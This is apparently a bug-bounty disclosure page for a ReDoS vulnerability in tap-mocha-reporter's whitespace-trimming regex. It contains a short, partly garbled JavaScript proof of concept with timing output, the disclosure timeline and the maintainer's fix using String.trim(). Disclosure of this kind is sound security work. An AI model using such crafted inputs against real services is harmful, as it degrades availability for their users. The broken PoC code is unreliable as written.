Inefficient Regular Expression Complexity in tapjs/tap-mocha-reporter


Reported on

Sep 21st 2021


I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in tap-mocha-reporter.

The ReDoS vulnerability is mainly due to the regex /^\s+|\s+$|/g and can be exploited with the following code.

Proof of Concept

// PoC.js
var tapMochaReporter = require("tap-mocha-reporter/lib/utils.js")

for(var i = 1; i <= 50000; i++) {
    var time =;
    var attack_str ='a' +' '.repeat(i*10000)+"a";
    var time_cost = - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")

The Output

"attack_str.length: 10002: 110 ms"
"attack_str.length: 20002: 408 ms"
"attack_str.length: 30002: 854 ms"
"attack_str.length: 40002: 1521 ms"
"attack_str.length: 50002: 2485 ms"
"attack_str.length: 60002: 3466 ms"


We created a GitHub Issue asking the maintainers to create a 2 years ago
We have contacted a member of the tapjs/tap-mocha-reporter team and are waiting to hear back 2 years ago
We have sent a second follow up to the tapjs/tap-mocha-reporter team. We will try again in 10 days. 2 years ago
We have sent a third and final follow up to the tapjs/tap-mocha-reporter team. This report is now considered stale. 2 years ago
a year ago


I'm not sure how an attacker would ever manage to call this function, so this feels like a self-pwn, but point of fact, String.trim() is supported on all platforms that can run tap-mocha-reporter (and in fact, String.trim() is used elsewhere in the library), and that performs much better anyway. Fixed on

isaacs validated this vulnerability a year ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
isaacs marked this as fixed in 5.0.2 with commit 50c8c3 a year ago
isaacs has been awarded the fix bounty
This vulnerability will not receive a CVE
utils.js#L261 has been validated
to join this conversation